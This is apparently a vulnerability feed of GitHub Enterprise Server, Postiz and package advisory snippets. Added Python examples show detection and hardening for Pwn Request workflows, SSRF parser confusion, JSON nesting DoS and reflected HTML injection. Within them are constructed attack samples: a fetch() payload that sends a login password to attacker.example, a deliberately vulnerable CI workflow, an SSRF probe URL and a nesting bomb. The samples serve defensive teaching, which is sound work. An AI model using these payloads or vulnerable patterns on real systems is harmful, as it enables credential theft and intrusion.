GHSA-XX64-WWV2-HCQQ vulnerabilities
Vulnerabilities for packages: pixi, uv...
GHSA-FP55-JW48-C537 vulnerabilities
Vulnerabilities for packages: pixi, uv...
GHSA-PP6C-GR5W-3C5G vulnerabilities
Vulnerabilities for packages: reflex, semgrep, airflow...
GHSA-2C5C-CHWR-9HQW vulnerabilities
Vulnerabilities for packages: opensearch, spark-kubernetes-operator-fips, spark-fips, spark-kubernetes-operator, opensearch-fips, apache-hop, druid, apache-hop-fips, trino, camunda, camunda-zeebe, spark...
Quasar Linux RAT Steals Developer Credentials for Software Supply Chain Compromise
A previously undocumented Linux implant codenamed Quasar Linux RAT (QLNX) is targeting developers' systems to establish a silent foothold as well as facilitate a broad range of post-compromise functionality, such as credential harvesting, keylogging, file manipulation, clipboard monitoring, and...
GHSA-P334-GFHQ-C7W6 vulnerabilities
Vulnerabilities for packages: jenkins...
GHSA-P3HW-MV63-RF9W vulnerabilities
Vulnerabilities for packages: cargo-audit, jujutsu...
CVE-2026-45152
creationtimestamp | type | source
---|---|---
2026-05-08 05:58:32+00:00 | published-proof-of-concept | https://github.com/uniget-org/cli/security/advisories/GHSA-qqq4-5773-pmw5
2026-05-27 23:01:08+00:00 | seen | https://bsky.app/profile/thehackerwire.bsky.social/post/3mmumf5pusa2l
2026-05-27...
GHSA-RMX9-2PP3-XHCR vulnerabilities
Vulnerabilities for packages: tekton-pipelines, tkn, tekton-chains...
GHSA-38F8-5428-X5CV vulnerabilities
Vulnerabilities for packages: hono, seata, spark-fips, keycloak, akhq, knative-kafka-broker-fips, flyway-fips, kayenta, apache-nifi, thingsboard, wavefront-proxy, camunda-zeebe, opensearch, opensearch-fips, nuxeo, spark, elasticsearch-fips, infinispan, kafbat-ui-fips, spark-kubernetes-operator,...
EUVD-2026-28461
An authentication bypass vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to create a local user account, bypassing the configured external identity provider. When external authentication was enabled, the signup endpoint did not properly enforce th...
EUVD-2026-28465
A reflected HTML injection vulnerability was identified in the GitHub Enterprise Server Management Console login page that could allow credential theft. The redirectto query parameter on the /setup/unlock endpoint was reflected into an HTML attribute without proper sanitization, enabling an...
EUVD-2026-28464
A server-side request forgery (SSRF) vulnerability was identified in the GitHub Enterprise Server notebook viewer that allowed an attacker to access internal services by exploiting URL parser confusion between the validation layer and the HTTP request library. The hostname validation used a differe...
EUVD-2026-28462
A denial of service vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to cause service disruption by sending crafted requests with deeply nested JSON payloads to an unauthenticated API endpoint. The endpoint parsed user-controlled JSON request bodie...
PT-2026-39212
Name of the Vulnerable Software and Affected Versions Postiz versions prior to commit da44801 Description A Pwn Request issue in the Build and Publish PR Docker Image workflow located in '.github/workflows/pr-docker-build.yml' allows unauthenticated users to execute arbitrary code during the Dock...
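The advisory snippet above describes the "Pwn Request" class: a workflow that runs on a privileged trigger, checks out the pull request's head, and then executes build steps from it, handing the PR author code execution with the workflow's secrets. The following is an added example, not Postiz's workflow or any file from its repository; the two workflow fragments are constructed to show the vulnerable shape beside a safe one, and the scan is a text heuristic, not a full YAML parser.

```python
import re

# Constructed workflow fragments for illustration (hypothetical, not the Postiz repo's files).
VULNERABLE_WORKFLOW = """\
name: Build and Publish PR Docker Image
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # attacker-controlled tree
      - run: docker build -t app:pr .                        # runs the PR's Dockerfile
      - run: echo "${{ secrets.REGISTRY_TOKEN }}" | docker login -u bot --password-stdin
"""

# Safe shape: build under plain pull_request (no secrets, read-only token);
# publishing belongs in a separate workflow_run job that never checks out the PR head.
HARDENED_WORKFLOW = """\
name: Build PR Docker Image
on:
  pull_request:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: docker build -t app:pr .
"""

# Triggers that run in the base repository's security context.
PRIVILEGED_TRIGGERS = ("pull_request_target", "workflow_run", "issue_comment")
UNTRUSTED_REF = re.compile(
    r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(sha|ref)\s*\}\}"
)
EXECUTES_CODE = re.compile(r"^\s*-?\s*run:|uses:\s*docker/build-push-action", re.MULTILINE)


def pwn_request_findings(workflow_yaml: str) -> list:
    """Heuristic scan: privileged trigger + checkout of PR head + code execution."""
    findings = []
    trigger = next(
        (t for t in PRIVILEGED_TRIGGERS if re.search(rf"^\s*{t}:", workflow_yaml, re.M)),
        None,
    )
    if trigger is None or not UNTRUSTED_REF.search(workflow_yaml):
        return findings
    findings.append(f"checks out untrusted PR head under privileged trigger '{trigger}'")
    if EXECUTES_CODE.search(workflow_yaml):
        findings.append("runs build steps on that checkout (attacker-controlled Dockerfile/scripts)")
    if "secrets." in workflow_yaml:
        findings.append("secrets are exposed in the same job")
    return findings


if __name__ == "__main__":
    for name, wf in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(name, pwn_request_findings(wf))
```

Run it against a checkout of `.github/workflows/*.yml` to triage; any hit needs manual review, since the heuristic does not follow reusable workflows or composite actions.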
CVE-2026-8034
A server-side request forgery (SSRF) vulnerability was identified in the GitHub Enterprise Server notebook viewer that allowed an attacker to access internal services by exploiting URL parser confusion between the validation layer and the HTTP request library. The hostname validation used a differe...
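The parser-confusion pattern named in the CVE-2026-8034 and EUVD-2026-28464 entries is easy to reproduce generically: a validator extracts the hostname one way, the HTTP client another, and a URL with userinfo (`user@host`) satisfies the first while the second connects elsewhere. The example below is added here and is not GitHub's code; the allow-list, function names and the regex-based validator are assumptions chosen to show the differential against Python's standard `urlsplit`, which `urllib.request` uses.

```python
import ipaddress
import re
from typing import Optional
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"allowed.example"}  # hypothetical allow-list

# Vulnerable validator: the character class stops at the first byte that is not
# valid in a hostname, so "allowed.example@evil.com" matches as "allowed.example".
HOST_RE = re.compile(r"^https?://([a-z0-9.-]+)", re.IGNORECASE)


def naive_is_allowed(url: str) -> bool:
    m = HOST_RE.match(url)
    return bool(m) and m.group(1).lower() in ALLOWED_HOSTS


def effective_host(url: str) -> Optional[str]:
    """Host the request library (urlsplit-based) actually connects to."""
    return urlsplit(url).hostname  # userinfo is stripped, leaving the real target


def hardened_is_allowed(url: str) -> bool:
    """Validate with the same parser the client uses, and reject ambiguity."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False  # userinfo has no legitimate use here; refuse it outright
    host = parts.hostname
    if host is None:
        return False
    try:
        ipaddress.ip_address(host)
        return False  # IP literals never match a name allow-list (blocks 127.0.0.1, 169.254.x)
    except ValueError:
        pass
    return host in ALLOWED_HOSTS


def canonical_url(url: str) -> str:
    """Re-serialize from the parse that was checked, so the client cannot
    reinterpret the original string; drops fragment and userinfo."""
    parts = urlsplit(url)
    netloc = parts.hostname or ""
    if parts.port:
        netloc += f":{parts.port}"
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    probe = "http://allowed.example@evil.com/"
    print("naive says allowed:", naive_is_allowed(probe))
    print("client would connect to:", effective_host(probe))
    print("hardened says allowed:", hardened_is_allowed(probe))
```

Two caveats for production use: the hostname must also be resolved and the resulting addresses checked against private and link-local ranges (DNS rebinding means the check belongs at connect time), and redirects must be re-validated, since a permitted host can 302 to an internal one.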
CVE-2026-8106
A reflected HTML injection vulnerability was identified in the GitHub Enterprise Server Management Console login page that could allow credential theft. The redirectto query parameter on the /setup/unlock endpoint was reflected into an HTML attribute without proper sanitization, enabling an...
CVE-2026-6736
An authentication bypass vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to create a local user account, bypassing the configured external identity provider. When external authentication was enabled, the signup endpoint did not properly enforce th...
CVE-2026-7541
A denial of service vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to cause service disruption by sending crafted requests with deeply nested JSON payloads to an unauthenticated API endpoint. The endpoint parsed user-controlled JSON request bodie...
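The CVE-2026-7541 and EUVD-2026-28462 entries describe a recursive JSON parser fed attacker-controlled nesting on an unauthenticated endpoint. The mitigation that does not depend on the parser's internals is to bound size and nesting before parsing. This is an added example, not GitHub's code; the limits and the pre-scan are assumptions, and the stdlib behaviour shown is CPython's `json` module raising `RecursionError` on its own when the nesting is deep enough.

```python
import json
from typing import Any

MAX_DEPTH = 32        # hypothetical limit; set to the deepest legitimate document plus margin
MAX_BYTES = 1_000_000  # hypothetical body cap, enforced before any parsing


def json_depth_ok(raw: str, max_depth: int = MAX_DEPTH) -> bool:
    """Linear, non-recursive pre-scan of bracket nesting.
    Brackets inside string literals (including escaped quotes) are ignored."""
    depth = 0
    in_string = False
    escaped = False
    for ch in raw:
        if in_string:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
            continue
        if ch == '"':
            in_string = True
        elif ch in "[{":
            depth += 1
            if depth > max_depth:
                return False  # bail out early; no need to read the rest
        elif ch in "]}":
            depth -= 1
    return True


class PayloadRejected(ValueError):
    """Raised before the real parser ever sees the body."""


def safe_loads(raw: str) -> Any:
    if len(raw) > MAX_BYTES:
        raise PayloadRejected("body too large")
    if not json_depth_ok(raw):
        raise PayloadRejected("nesting too deep")
    return json.loads(raw)


def is_rejected(raw: str) -> bool:
    try:
        safe_loads(raw)
        return False
    except PayloadRejected:
        return True


def stdlib_behaviour(depth: int) -> str:
    """What json.loads does unaided with `depth` nested arrays (CPython)."""
    try:
        json.loads("[" * depth + "]" * depth)
        return "parsed"
    except RecursionError:
        return "RecursionError"


if __name__ == "__main__":
    bomb = "[" * 100_000 + "]" * 100_000   # constructed nesting bomb
    print("stdlib alone:", stdlib_behaviour(100_000))
    print("pre-scan rejects bomb:", is_rejected(bomb))
```

The pre-scan costs one pass over the bytes and no stack, so it can sit in front of any parser (including ones in other languages that would stack-overflow rather than raise). For an unauthenticated endpoint, pair it with a rate limit, since even a cheap rejection is still work per request.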
CVE-2026-8106 Reflected HTML injection vulnerability in GitHub Enterprise Server Management Console login page allowed credential theft
A reflected HTML injection vulnerability was identified in the GitHub Enterprise Server Management Console login page that could allow credential theft. The redirectto query parameter on the /setup/unlock endpoint was reflected into an HTML attribute without proper sanitization, enabling an...
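The CVE-2026-8106 and EUVD-2026-28465 entries describe a redirect parameter reflected into an HTML attribute on a login page. Two independent defences apply: the value must be a same-origin path (so it cannot be abused as an open redirect either), and whatever is emitted must be attribute-escaped. The example below is added here and is not GitHub's Management Console code; the form markup, parameter handling and attack string are constructed to show the break-out and its fix.

```python
import html
from urllib.parse import urlsplit

# Constructed attack string: closes the value attribute and adds an event handler
# that exfiltrates the password field once the input takes focus.
ATTACK = '" autofocus onfocus="fetch(\'https://attacker.example/?c=\'+document.forms[0].password.value)'


def render_naive(redirect_to: str) -> str:
    """Vulnerable: raw reflection into an attribute value (illustrative only)."""
    return (
        f'<form method="post"><input type="hidden" name="redirect_to" value="{redirect_to}">'
        '<input name="password" type="password"></form>'
    )


def is_safe_redirect(target: str) -> bool:
    """Accept only same-origin absolute paths.
    Rejects scheme-relative '//host', absolute URLs, backslashes (browsers treat
    '\\' as '/'), and control characters that could split headers."""
    if not target.startswith("/") or target.startswith("//"):
        return False
    if "\\" in target or any(c in target for c in "\r\n\x00"):
        return False
    parts = urlsplit(target)
    return parts.scheme == "" and parts.netloc == ""


def render_hardened(redirect_to: str) -> str:
    """Validate first, then escape for the attribute context (quote=True escapes both quote kinds)."""
    target = redirect_to if is_safe_redirect(redirect_to) else "/"
    return (
        '<form method="post"><input type="hidden" name="redirect_to" '
        f'value="{html.escape(target, quote=True)}">'
        '<input name="password" type="password"></form>'
    )


if __name__ == "__main__":
    print(render_naive(ATTACK))
    print(render_hardened(ATTACK))
    print(render_hardened('/setup/settings" onfocus="x'))
```

Escaping alone would have stopped the attribute break-out; the path check is what also stops `redirect_to=https://attacker.example/` from walking a user off-site after a successful login, which is why both are kept.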